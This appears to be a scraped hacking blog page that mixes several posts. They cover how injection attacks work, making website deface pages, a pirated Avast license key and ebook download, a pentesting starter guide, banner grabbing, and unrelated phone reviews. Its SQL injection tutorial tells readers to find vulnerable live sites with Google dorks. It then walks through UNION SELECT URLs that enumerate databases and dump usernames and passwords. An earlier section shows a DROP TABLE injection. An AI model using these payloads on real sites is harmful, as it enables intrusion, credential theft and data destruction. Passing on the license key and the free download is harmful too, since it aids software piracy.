HOW INJECTION ATTACKS WORK

HOW INJECTION ATTACKS WORK





Injection attacks are based on a single problem that persists in many technologies: namely,

no strict separation exists between program instructions and user data (also referred to as

user input). This problem allows for attackers to sneak program instructions into places

where the developer expected only benign data. By sneaking in program instructions, the

attacker can instruct the program to perform actions of the attacker’s choosing.

To perform an injection attack, the attacker attempts to place data that is interpreted
as instructions in common inputs. A successful attack requires three elements:


• Identifying the technology that the web application is running. Injection attacks

are heavily dependent on the programming language or hardware possessing

the problem. This can be accomplished with some reconnaissance or by simply

trying all common injection attacks. To identify technologies, an attacker can

look at web page footers, view error pages, view page source code, and use

tools such as nessus, nmap, THC-amap, and others.



• Identifying all possible user inputs. Some user input is obvious, such as HTML

forms. However, an attacker can interact with a web application in many ways.

An attacker can manipulate hidden HTML form inputs, HTTP headers (such as

cookies), and even backend Asynchronous JavaScript and XML (AJAX) requests

that are not seen by end users. Essentially all data within every HTTP GET and

POST should be considered user input. To help identify all possible user inputs to

a web application, you can use a web proxy such as WebScarab, Paros, or Burp.



• Finding the user input that is susceptible to the attack. This may seem diffi cult,

but web application error pages sometimes provide great insight into what user

input is vulnerable.

The easiest way to explain injection attacks is through example. The following SQL

injection example provides a solid overview of an injection attack, while the other

examples simply focus on the problem with the specific language or hardware.





Attackers use SQL injection to do anything from circumvent authentication to gain

complete control of databases on a remote server.

SQL, the Structured Query Language, is the de facto standard for accessing databases.

Most web applications today use an SQL database to store persistent data for the

application. It is likely that any web application you are testing uses an SQL database in

the backend. Like many languages, SQL syntax is a mixture of database instructions and

user data. If a developer is not careful, the user data could be interpreted as instructions,

and a remote user could perform arbitrary instructions on the database.

Consider, for example, a simple web application that requires user authentication.

Assume that this application presents a login screen asking for a username and password.

The user sends the username and password over some HTTP request, whereby the web

application checks the username and password against a list of acceptable usernames

and passwords. Such a list is usually a database table within an SQL database.

A developer can create this list using the following SQL statement:

-------------------------------------------------------------------------------------------

CREATE TABLE user_table (

id INTEGER PRIMARY KEY,

username VARCHAR(32),

password VARCHAR(41)

);

-------------------------------------------------------------------------------------------


This SQL code creates a table with three columns. The first column stores an ID that

will be used to reference an authenticated user in the database. The second column holds

the username, which is arbitrarily assumed to be 32 characters at most. The third column

holds the password column, which contains a hash of the user’s password, because it is

bad practice to store user passwords in their original form.

We will use the SQL function PASSWORD() to hash the password. In MySQL, the

output of PASSWORD() is 41 characters.

Authenticating a user is as simple as comparing the user’s input (username and

password) with each row in the table. If a row matches both the username and password

provided, then the user will be authenticated as being the user with the corresponding

ID. Suppose that the user sent the username lonelynerd15 and password mypassword. The

user ID can be looked up:
-------------------------------------------------------------------------------------------

SELECT id FROM user_table WHERE username='lonelynerd15' AND

password=PASSWORD('mypassword')

-------------------------------------------------------------------------------------------


If the user was in the database table, this SQL command would return the ID

associated with the user, implying that the user is authenticated. Otherwise, this SQL

command would return nothing, implying that the user is not authenticated.

Automating the login seems simple enough. Consider the following Java snippet

that receives the username and password from a user and authenticates the user via an

SQL query:

-------------------------------------------------------------------------------------------

String username = req.getParameter("username");

String password = req.getParameter("password");

String query = "SELECT id FROM user_table WHERE " +

"username = '" + username + "' AND " +

"password = PASSWORD('" + password + "')";

ResultSet rs = stmt.executeQuery(query);

int id = -1; // -1 implies that the user is unauthenticated.

while (rs.next()) {

id = rs.getInt("id");

}

-------------------------------------------------------------------------------------------
The first two lines grab the user input from the HTTP request. The next line constructs

the SQL query. The query is executed, and the result is gathered in the while() loop. If

a username and password pair match, the correct ID is returned. Otherwise, the id stays

-1, which implies the user is not authenticated.

If the username and password pair match, then the user is authenticated. Otherwise,

the user will not be authenticated, right?

Wrong! There is nothing stopping an attacker from injecting SQL statements in the

username or password fields to change the SQL query.

Let’s re-examine the SQL query string:
-------------------------------------------------------------------------------------------

String query = "SELECT id FROM user_table WHERE " +

"username = '" + username + "' AND " +

"password = PASSWORD('" + password + "')";
-------------------------------------------------------------------------------------------

The code expects the username and password strings to be data. However, an

attacker can input any characters he or she pleases. Imagine if an attacker entered the

username ’OR 1=1 -- and password x; then the query string would look like this:
-------------------------------------------------------------------------------------------

SELECT id FROM user_table WHERE username = '' OR 1=1 -- ' AND password

= PASSWORD('x')
-------------------------------------------------------------------------------------------

The double dash (--) tells the SQL parser that everything to the right is a comment,

so the query string is equivalent to this:

-------------------------------------------------------------------------------------------
SELECT id FROM user_table WHERE username = '' OR 1=1
-------------------------------------------------------------------------------------------


The SELECT statement now acts much differently, because it will now return IDs

where the username is a zero length string ('') or where 1=1; but 1=1 is always true! So

this statement will return all the IDs from user_table.

In this case, the attacker placed SQL instructions ('OR 1=1 --) in the username

field instead of data.



Choosing Appropriate SQL Injection Code

To inject SQL instructions successfully, the attacker must turn the developer’s existing

SQL instructions into a valid SQL statement. For instance, single quotes must be closed.

Blindly doing so is a little difficult, and generally queries like these work:

-------------------------------------------------------------------------------------------

• ' OR 1=1 --

• ') OR 1=1 --

-------------------------------------------------------------------------------------------
Also, many web applications provide extensive error reporting and debugging

information. For example, attempting ' OR 1=1 -- blindly in a web application often

gives you an educational error message like this:


-------------------------------------------------------------------------------------------

Error executing query: You have an error in your SQL syntax; check the

manual that corresponds to your MySQL server version for the right

syntax to use near 'SELECT (title, body) FROM blog_table WHERE

cat='OR 1=1' at line 1

-------------------------------------------------------------------------------------------



The particular error message shows the whole SQL statement. In this case, it appears

that the SQL database was expecting an integer, not a string, so the injection string

OR 1=1 --, without the proceeding apostrophe would work.

With most SQL databases, an attacker can place many SQL statements on a single line

as long as the syntax is correct for each statement. For the following code, we showed

that setting username to ' OR 1=1 and password to x returns that last user:


-------------------------------------------------------------------------------------------
String query = "SELECT id FROM user_table WHERE " +

"username = '" + username + "' AND " +

"password = PASSWORD('" + password + "')";


-------------------------------------------------------------------------------------------
However, the attacker could inject other queries. For example, setting the username to

this,
-------------------------------------------------------------------------------------------

' OR 1=1; DROP TABLE user_table; --

-------------------------------------------------------------------------------------------


would change this query to this,
-------------------------------------------------------------------------------------------

SELECT id FROM user_table WHERE username='' OR 1=1; DROP TABLE

user_table; -- ' AND password = PASSWORD('x');

-------------------------------------------------------------------------------------------

which is equivalent to this:
-------------------------------------------------------------------------------------------

SELECT id FROM user_table WHERE username='' OR 1=1; DROP TABLE

user_table;
-------------------------------------------------------------------------------------------



This statement will perform the syntactically correct SELECT statement and erase the

user_table with the SQL DROP command.



Injection attacks are not necessary blind attacks. Many web applications are developed

with open-source tools. To make injection attacks more successful, download free or

evaluation copies of products and set up your own test system. Once you have found an

error in your test system, it is highly probable that the same issue will exist on all web

applications using that tool.

Read More

Set Up VirtualBox

★ How To Set Up VirtualBox - Beginner ★

Here I will explain how to set up a virtual machine and in this case it's VirtualBox. There are many benefits to having a virtual box. It allows you to run another OS inside your current OS. You can also use it to test viruses/bots/keyloggers without having to worry about the infection spreading. Think of it as a disposable computer. Sandbox but on a much larger scale.

For this tutorial you will need:

• VirtualBox
• ISO, CD or bootable USB with the operating system of your choice.

Start of by downloading the VirtualBox installation. You can download it from the official site. Once installed, run VirtualBox and you'll be presented with the screen above.

Click on new and you'll be asked to choose your operating system that you're using. You can see the various options that are on offer. Choose the one you are installing and give your operating system a name. This doesn't have to relate to the operating system, it's just a name you pick like for a user profile.



Here you choose the amount of RAM to assign to the virtual operating system. Make sure the amount of RAM assigned is enough for the operating system but also insuring that your PC will not be under strain. I suggest not going over half of your total RAM. If you have 4GB installed, assign no more than 2GB to your virtual box.



Were making a new machine here, so we'll pick the middle option. Here you'll also pick the type of virtual box hard drive file. Don't worry too much about what each option does, the one I've selected will do fine. If you pick a dynamically allocated space it just means the size of the virtual box file will increase as you go along and if you picked fixed size it will stay the same until you change it yourself.



Once you've picked the size of your hard drive, you'll be presented with the final few steps. Press the Start button on this window.



Click the folder icon and you'll be asked to pick a file. Choose your ISO & press start. Follow on-screen instructions to finalize the setup.

Troubleshooting:

Q: The internet on my Virtualbox doesn't work.

A: Make sure you installed the network adapter during install, make sure it installed properly and make sure your physical and virtual adapter are allowed to communicate.

Q: System error: Bootable media not found.

A: See screenshot below, you need to make sure Virtualbox is able to access the bootable media.

Read More

Make your own Deface Page

Make your own Deface Page!
Today i will teach you guys the basics of making your very own deface pages.
It will teach you the basics to create your own unique defaces.

Preview:Click to Hide)

Step #1:

The first step is to create the file structure that we are going to use. Now remember, this is proper HTML coding and should always be used, keeps it neat and proffesional.
This should be done in a text editor, like notepad or notepad++



Code:
==================================================================
<HTML> </HTML> - Are the HTML tags that specify that its a valid html document.

==================================================================

Code:
==================================================================

<HEAD> </HEAD> - Specify the head of the document, where you do all the styling and declaring of div's,link's,etc

==================================================================

Code:

==================================================================
<TITLE> HACKED! </TITLE> - Specifies the title of the html page.

==================================================================
Code:

==================================================================
<BODY> </BODY> - the body tags hold the majority of the deface page code.


==================================================================
Step #2:

Create a header and some text under the header. This has to be done in the "<body>" tags! nowhere else.


==================================================================

Code:

<CENTER> </CENTER> - Aligns all content between the tags directly in the middle.

==================================================================
Code:

<H1> </H1> - Is the Biggest Header tag, there are many other types like h1,h2,h3
==================================================================
Code:
<PRE> </PRE> - These tags work in a way that places the content inbetween them exactly where they are.
As you can see, all the content that we want displayed on the deface page is within the <body> tags! This is very important!

==================================================================
Step #3:

The final step. Here is where we are going to style the the deface page to give it a unique feel and appearance.


========================================================================

==================================================================
Code:

<style type="text/css">

h1 {
color: #ddd;
font-size: 60pt;
}
</style>

This is CSS (Cascading Style Sheets) it basically styles whatever is declared, which in this case is the content within the <h1> tags.
two changes have been made, we changed the color to #ddd and the font-size to 60pt.
If you want to add images/pictures to a deface page, this can be done easily with the <img> tags.
==================================================================
Code:

<img src="http://www.linktoimage.com/" alt="Picture">
And if you want to add a youtube video to your deface page, thats easy aswell!

==================================================================
Code:

<embedded src="http://www.youtube.com/v/VIDEOIDHERE&autoplay=1&replay=1" width="1px" height="1px">
==================================================================

Read More

Avast 8 License Key.

                                     Avast 8 License Valid Till 2038

          Nothing to say detail about Avast antivirus.this is one of the most popular antivirus.are you looking for Avast License Key Valid Until 2038download link? yes now i will give you Avast License Key Valid Until 2038

                   Avast Features : 

     >>Avast antivirus has Streaming and real time virus database updates.

>>It has Files reputation system Features.

>>AVAST has Management Portal System.

>>Avast contain Remote Assistance Tool.

>>Avast has Customizable installation.

     Avast License Key Valid until 2038       :  

W6754380R9978A0910-4TZ59467

Read More

Android 4.4 KitKat detailed again in new Nexus 5 

photo leak

Purported photos of Google's next flagship Nexus phone crop up showing what looks like a final version of Android 4.4 KitKat.

(Credit: Tutto Android)

Ahead of the much-anticipated debut of Android 4.4 KitKat are even more shots of Google's next flagship Nexus phone and the OS update.

Italian tech site Tutto Android has an extensive gallery of the device with notes on what's new or different. That list includes tweaked voice activated search, a new camera shortcut from the lock screen, a different app drawer, and a camera that appears to use image stabilization.

photos come a week after an extensive leak from tech blog GadgetHelpLine, which posted a gallery of 4.4 shots showing new features like wireless display support, cellular phone plan settings, and new printing and payment options.

Google announced the name of its next Android OS update last month, surprising some by licensing the popular candy bar namesake from Nestle. It follows July's release of Android 4.3 Jelly Bean, which was introduced in late July alongside Google'sNexus 7 tablet.

Google's expected to take the full wraps off the OS update at an event this month.

Read More

Hacking Exposed Web 2.0

Web 2.0 Security Secrets and Solutions

Book DescriptionProtect your Web 2.0 architecture against the
latest wave of cybercrime using expert tactics
from Internet security professionals.
Hacking Exposed Web 2.0 shows how hackers
perform reconnaissance,
choose their entry point, and attack Web 2.0
- based services, and reveals detailed
countermeasures and defense techniques.
You'll learn how to avoid injection and
buffer overflow attacks, fix browser and
plug-in flaws, and secure AJAX, Flash,
and XML-driven applications. Real-world case
studies illustrate social networking
site weaknesses, cross-site attack methods,
migration vulnerabilities, and IE
shortcomings.

Book Details
Publisher: McGraw-Hill
By: Rich Cannings,
Himanshu Dwivedi,
Zane Lackey
ISBN: 978-0-0714-9461-8
Year: 2007
Pages: 258
Language: English
File size: 6.9 MB
File format: PDF

eBook
Download: Free

Read More

SQL injection Tutorial

SQL injection Tutorial

FOR EDUCATIONAL PURPOSES



Finding vulnerable sites
Finding amount of columns
Getting mysql version current user
Getting Databases
Getting Tables
Getting Columns
Getting Usernames and Passwords






1. Finding vulnerable sites

To find Vulnerable sites you are going to use Google Dorks.

Some common dorks are:

====================================================================

Code:


inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=

=================================================================


lets say you got this site:

=============================================
Code:


http://site.com/news/view.php?id=828
============================================
if we add a ' before or after the numbers it should look something like this if its vulnerable:



2. Finding amount of columns


To find the right amount of columns we are using "order by". here is how it works:

===============================================================


Code:

http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)
===============================================================

This means or site has 8 columns and we will now move over to "union select".


This is how it works:
===============================================================
Code:


http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--
===============================================================


Note the hyphen - before the numbers!
===============================================================


This should make the website to show some numbers on the screen like this:




===============================================================

This meens its absolutly sure that the site is vulnerable to sql injection.


3. Getting MySQL version and Current User


Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).



Code:


http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--








To get the Current user you type this:


===============================================================

Code:


http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--
===============================================================


This should display:










4. Getting Databases




Now we wanna find the databases and the Current database.

Here the syntax for all databases:

===============================================================


Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--

===============================================================

It should displays something like this:







Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.


Syntax for current database:

===============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8

===============================================================

This should display something like this:










5. Getting Tables



Now we want to know the tables on in the database and for this we will conintue using "union select".


===============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--

===============================================================


This should display something like this:








We now know that the table that passwords should be stored in are called bpusers, write it down and move on.


6. Getting Columns


Now we want to know the columns.



============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--

============================================================

This should display something like this:






7. Dumping users/pass




Now you would like to dump logins and passwords from bpusers.


Here is the code for thath:

==================================================================
Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--

======================================================




(NOTE: 0x3a will make a : between logins and passwords.)



You have now performed a SQL injection attack.

Read More

Get source code from apk file

What is .apk file?
 APK file is nothing but Android Package File(APK). APK is the file format used to distribute and install application software and middleware on Google's Android operating system.

Apk Files are Zip file formatted packages based on the JAR file format, with .apk extension. Apk files contains all program resources and code i.e it contains .dex files, resources, assets, certificates, and manifest file.



How to get source (java files) from .apk file?
As we now know that apk file is just a zip file containing all program resource file, we can now get java code from apk files with ease. Following are steps to get java code from apk files.
Step 1:Renaming .apk file

• Rename the .apk file with the extension .zip (for example let the file be "demofile.apk" then after renaming it becomes "demofile.apk.zip")

Step 2:Getting java files from apk

• Now extract the renamed zip file in specific folder, for example let that folder be "demofolder".
• Now Download dex2jar from the link for windows and extract that zip file in folder "demofolder".
• Now open command prompt and go to the folder created in previous step and type the command "dex2jar classes.dex" and press enter.This will generate "classes.dex.dex2jar" file in the same folder.
• Now  Download java decompiler from the link and extract it and start(double click) jd-gui.exe
• From jd-gui window browse the generated "classes.dex.dex2jar" file in demofolder, this will give all the class files by src name.
• Now from the File menu select "save all sources" this will generate a zip file named "classes_dex2jar.src.zip" consisting of all packages and java files.
• Extract that zip file (classes_dex2jar.src.zip) and you will get all java files of the application.

Above steps will generate java files but to get xml files perform following steps.

Step 3:Getting xml files from apk

• Download apktool and apktool install from the link and extract both files and place it in the same folder (for example "demoxmlfolder").
• Place the .apk file in same folder (i.e demoxmlfolder)
• Now open command prompt and goto  the directory where apktool is stored (here "demoxmlfolder") and type the command "apktool if framework-res.apk" 
• Above command should result in "Framework installed ..."
• Now in command prompt type the command "apktool d filename.apk" (where filename is name of apk file)
• This will generate a folder of name filename in current directory (here demoxmlfolder) where all xml files would be stored in res\layout folder.

Read More

BECOMING A PENETRATION TESTER

WHERE TO BEGIN ON THE PATH TO BECOMING A PENETRATION TESTER

What you will need:

1) Books
2) Virtual Machines (or physical machines)
3) Operating Systems
4) Hardware
5) Software
6) Basics

So, let us begin with the most important part- the books. Now, most people here will tell you that you should hack to learn, not learn to hack, but you actually need to do BOTH simultaneously. To do this, you need books/knowledge of what it is you want to do, some form of tutorial or article on how it is done/ideas of where to start, and access to a virtual lab to try out new things.

Books You'll Need:
TCP/IP Il
lustrated, Volume 1 Protocols
This book should give you a fairly good grasp on basic concepts of networking.
You will also want to look into staying anonymous on the internet, so do some research into using Tor and I2P.
Nmap Network Scanning
This book will give you an in-depth look into the most popular and most effective port scanning tool.
Beginning PenTesting with Kali Linux
This book will give you a very good idea of the different tools in Kali Linux and will give you a great start on information gathering and how to approach gaining access into a system through different avenues and attack vectors.
Command Line Course
This book will take you through the basics in command line usage for both Windows PowerShell and the Linux command line.
Python Cookbook
Violent Python
Assembly Programming for Intel x64 Processors
Intel Assembly Developer Manuals
Learning Perl
Programming in C
PHP and MYSQL Web Development
Those would be the basic primers for languages that you will encounter and eventually need to know in order to change code or edit and write your own exploits.
There are multitudes of other available books, but these are some high quality ones that are recommended.

Virtual Machines:

There are two main software programs to run virtual machines in. One is the open source VirtualBox and the other is the commercial based VMWare. Either programs should be sufficient for basic lab testing. People use both, so you should always find someone you can help you.
Having your own personal lab to test on is vital. You should not test on real world machines because they can land you in serious trouble. Always make sure you have permission.The virtual environment will allow you to watch first hand what happens to both sides of the action. Plus, if something goes amiss, you can simply revert and tweak. You should be using Kali Linux (not BackTrack) as your attacking machine in your lab. You can use intentionally vulnerable VMs such as Metasploitable, Damn Vulnerable Web Application, and Damn Vulnerable Linux. You should also get images for the operating systems below as you'll have to gain knowledge on a wide spectrum of operating systems if you intend to be a decent penetration tester.

Operating Systems:

Server 2003
Server 2008 (R2)
Server 2012
Windows XP
Windows 7
Windows 8
Mac OSX
Ubuntu Server
RHEL

You will encounter every single one of these in the wild. You should become familiar with them, read about them, and break them.

Hardware:

You should obtain a firewall as you'll need something that can block off your test network from the rest of your network. This is provide a fairly close setup to what the real world offers. It can let you see what data can bypass the firewall and you can see what happens when someone port scans, requests data, etc. This can also help you practice avoiding intrusion detection systems (IDS).

Software:

Two pieces of software that aren't covered in the Kali book are Currports and Wireshark. Currports can be used to show you your active ports on Windows machines. It will show where your ports are going and pointing to; it will also help you get an idea of what services default to where so you can identify the points of attack. Wireshark is a program that sniffs all network traffic so that you can watch the packets fly back and forth in real time. Other software is better covered in the Kali book.

Basics:

Basic configuration for most networks:


The firewall will act as the main filter between the target network and the internet. Should this be compromised, the attacker will have full access to the internal network. A second, but less filtered, firewall between the wireless and the internal network can act as another nuisance to help thwart an attacker.

The target network's public IP address(es) is/are the link(s) between the attacker and the target network. By knowing the address(es), you can began a port scan. This will show you what services are running on the open ports, what operating systems are running those services, and if there are any vulnerabilities. There are often times multiple public IP address associated with a network, so it is advisable to scan a range of IP addresses to find several points of entry.

If you are unsure if the target network's IP address(es), you can try to ping their domain names (such as mail.companyname.com) to find it/them. Once you have found a domain name, you can run a nmap scan such as "nmap -vv -sV -Pn -T2 domain.companyname.com" to gather additional information.

Once you have solid information on their network, you can began to move on to vulnerability scanners such as Nessus, Nexpose, or OpenVAS to find vulnerabilities in the network. They can tell you if a network is vulnerable. They will also provide you more information on how to fix that vulnerability and/or how to exploit that vulnerability, if it is possible. 

Read More

The Galaxy Gear

Samsung is the first major tech company out of the gate with a modern wearable device, the Galaxy Gear.

The Galaxy Gear is a $300 Android-powered watch with a 1.6-inch touchscreen. It only works if you tether it to Samsung's new Galaxy Note 3 smartphone or Galaxy Note 10.1 tablet using Bluetooth, but Samsung says it's working to add compatibility for other Galaxy devices.I've been using the Galaxy Gear for five days, but didn't find it to be nearly as useful as I had hoped.
How It Works

The Gear setup process is pretty awkward. You have to clip it into a special charging module, then tap the contraption to the back of your Galaxy Note 3. This triggers the Note 3 to download a special app called Gear Manager that lets you control the watch. Gear Manager is what you'll need to adjust just about everything on the watch from notifications to installed apps. Without the phone, the Gear can't do much more than show you the time until you pair it again.




Steve Kovach/Business Insider

The Galaxy Gear only works with a special app on the phone.

Out of the box, the Gear can alert you when you get a new email, calendar appointment, text, or phone call. You can answer incoming calls without pulling your phone out thanks to a built-in speaker and microphone on the wristband. You can also make calls either by typing in the number manually or using Samsung's virtual assistant called S Voice to tell the device to dial with a command like, "call Laura."



There are a slew of other basic features:
An internal motion sensor switches the screen on when you raise your wrist so you can get a quick glance at the time and weather.
There's a pedometer for tracking your steps. It syncs with Samsung's S Health app on the Note 3 to help monitor your progress.
You can bypass the passcode on your phone's lock screen if the Galaxy Gear is within range of the Note 3.
Samsung has a special store on the Note 3 where you can download apps to the Galaxy Gear, but the selection is limited. (More on that later.)
You can snap photos with a camera implanted in the wristband and beam them to the Note 3's photo gallery.
If you get a notification on the Galaxy Gear, simply picking up your phone will automatically launch the app you need.
Using It

The Galaxy Gear does its job well when it comes to incoming texts and phone calls. It's really nice to be able to glance at your wrist, see who's calling, and start chatting away without having to dig for your phone. I can also see it being a good hands-free alternative to a speaker phone system in a car, one that's always with you. I also enjoyed how the Gear detects when you lift your wrist, so you can quickly glance at the time and weather conditions.

But notifications for just about everything else don't work as well. The Gear doesn't have a lot of third-party app support, so you can't use it with popular services like Twitter, Facebook, Gmail, Instagram, etc. Samsung did add in a workaround for some services like Gmail and Twitter, but you only get a notification that you have a new item. You're still prompted to look at your phone to read a new Gmail message or tweet. And that completely defeats the purpose of what a smart watch is supposed to do. It's hard to justify using the Gear when it just makes you pull out your phone for most stuff anyway.

As far as apps go, the selection is pretty dim. Right now you can get Snapchat, Path, Evernote, and a few other apps you've probably never heard of. But those apps aren't that great. I had a lot of trouble getting Evernote to sync with the Note 3, and it's pretty awkward to shoot a Snapchat photo from your wrist. Path, a mobile-only social network, probably has the best Gear app right now, but only because it makes it really easy to check into a venue like you would on Foursquare. Other than that, you're pretty limited by the small screen.




Steve Kovach/Business Insider

Some apps on the Galaxy Gear.

The camera is a bit awkward to use too. It sits on the side of the wristband, perpendicular to the screen, which makes it hard to see what you're about to snap. Once you do take a photo, you can beam it back to your Note 3 over Bluetooth. Samsung says the Gear's camera isn't designed to replace your regular smartphone camera. Instead, it's a way to help you scan real-world items like barcodes or QR codes. Unfortunately, there aren't any apps that can do that with the Gear, and even if there were, you'd likely never use them.




I also had a lot of trouble with Samsung's voice assistant S Voice. In theory, S Voice lets you dictate a command into the Gear to make a call, send a text, check the weather, etc. But it was incredibly slow for me. In many cases, by the time S Voice was able to register my command I could've just done the task myself by pulling out the smartphone.

(Again, that defeats the purpose of having a smart watch. The point is to keep your phone tucked away.)
Design And Hardware

I usually criticize Samsung's products for being built with cheap-feeling plastic, but the Gear is different. This is the first mobile device I've used from the company that feels sturdy and well built. It's made mostly from metal, and the band is a durable plastic that fits comfortably around your wrist. I tested the black version, which is pretty inconspicuous, but the Gear also comes in several other eye-catching colors like orange or yellow.




Steve Kovach/Business Insider

It's not that attractive though. The Gear is a lot thicker and heavier than I had expected, and has an odd industrial look on its face thanks to the four visible screws in each corner. It's essentially just a shrunken down smartphone, making it feel chunky and awkward on your wrist. The Gear is hardly the fashion statement Samsung execs made it out to be when the device was first introduced.


Conclusion

The Galaxy Gear is so limited that I can't even justify an excuse like, "well, it's just a first-generation product that will get better in time." The Gear feels more like an unfinished product, something Samsung rushed out just so it could be first to market.

The saying "measure twice, cut once" doesn't apply here. It seems like Samsung didn't even measure before rushing the Gear out the door. This is one product I don't think anyone should buy, at least until Samsung is able to add more features and convince other app developers to do the same
.

Read More

How Web Servers Work

How Web Servers Workand web server vulnerabilities

Web servers use Hypertext Transfer Protocol (HTTP) and Hypertext Transfer Protocol

Secure (HTTPS) to allow web-based clients to connect to them and view and download

files. HTTP is an Application-layer protocol in the TCP/IP stack. HTTP and HTTPS are

the primary protocols used by web clients accessing web pages residing on web servers on

the Internet. Hypertext Markup Language (HTML) is the language used to create web

pages and allows those pages to be rendered in web browser software on web clients.

The HTTP protocol operates as shown

1. The web client initially opens a connection to the web server IP address using TCP port 80.

2. The web server waits for a GET request from the client requesting the home page for

the website.

3. The web server responds with the HTML code for the web server home page.

4. The client processes the HTML code and the web client’s browser software renders the

page on the client device.







Types of Web Server Vulnerabilities

Web servers, like other systems, can be compromised by a hacker. The following vulnerabilities

are most commonly exploited in web servers:

Misconfiguration of the Web Server Software A common issue with using Microsoft’s

Internet Information Server (IIS) as a web server is the use of the default website. The

permissions on the default website are open, meaning the default settings leave the site

open to attack. For example, all users in the everyone group have full control to all the

files in the default website directory. It is critical to edit and restrict permissions once IIS is

installed on the server as the default system user, IUSR_COMPUTERNAME, is a member

of the everyone group. Consequently, anyone accessing the default website will be able to

access all files in the default website folder and will have dangerous permissions such as

Execute and Full Control to the files. See Exercise 8.1 to learn how to disable the default

website in IIS.

Operating System or Application Bugs, or Flaws in Programming Code All programs,

including the OS and web server applications, should be patched or updated on a regular

basis. For Windows systems, this includes security patches, hotfixes, and Windows

Updates. All of these patches can be automated or manually applied to the systems once

they have been tested.

Vulnerable Default Installation Operating system and web server software settings

should not be left at their defaults when installed, and should be updated on a continuous

basis.

Hackers exploit these vulnerabilities to gain access to the web server. Because web servers

are usually located in a demilitarized zone (DMZ)—which is a publicly accessible area between

two packet filtering devices and can be easily accessed by the organization’s client systems—an

exploit of a web server offers a hacker easier access to internal systems or databases.

Attacking a Web Server

Web servers typically listen on TCP port 80 (HTTP) and TCP port 443 (HTTPS). Because

those ports must be open and available to web clients, any firewalls or packet filtering devices

between the web client and web server must pass traffic destined for those ports. Web application

software sits on top of the web server software and allows access to additional ports.

One of the initial information-gathering steps targeting web servers is banner grabbing.

Banner grabbing is an attempt to gather information about a web server such as the OS and

web server software and version. Exercise 8.3 shows you how to use banner grabbing.

Banner Grabbing

1. At the command prompt on your Windows PC, type

telnet <IPaddress> 80

The IP address is the address of the web server target. Also, the URL can be used

instead of the IP address.

2. Next, in the telnet window type

HEAD/HTTP/1.0

Then press Enter.

The web server banner will then be returned. The banner will look something like the following:

Server: Microsoft-IIS/5.0

Date: Fri, 14 Aug 2009 1:14:42 GMT

Content-Length:340

Content-Type: text/html

The banner grabbing result will usually identify the web server type and version. This

information is important because exploits against this web server type and version can be

identified. The next step after banner grabbing would be to attack the web server or attack

a web application and gain access to data on the server.

A benign but visible type of attack against web servers is defacement. Hackers deface

websites for sheer joy and an opportunity to enhance their reputations rather than gathering

any useful data. Defacing a website means the hacker exploits a vulnerability in the OS or

web server software and then alters the website files to show that the site has been hacked.

Often the hacker displays their hacker name on the website’s home page.

Common website attacks that enable a hacker to deface a website include the following:

=>Capturing administrator credentials through man-NN in-the-middle attacks

=> Revealing an administrator password through a brute-force attack

=> Using a DNS attack to redirect users to a different web server

=> Compromising an FTP or email server

=> Exploiting web application bugs that result in a vulnerability

=> Misconfiguring web shares

=> Taking advantage of weak permissions

=> Rerouting a client after a firewall or router attack

=> Using SQL injection attacks (if the SQL server and web server are the same system)

=> Using telnet or Secure Shell (SSH) intrusion

=> Carrying out URL poisoning, which redirects the user to a different URL

=> Using web server extension or remote service intrusion

=> Intercepting the communication between the client and the server and changing the cookie
to make the server believe that there is a user with higher privileges (applies to cookieenabled
security)

for educational purpose

Read More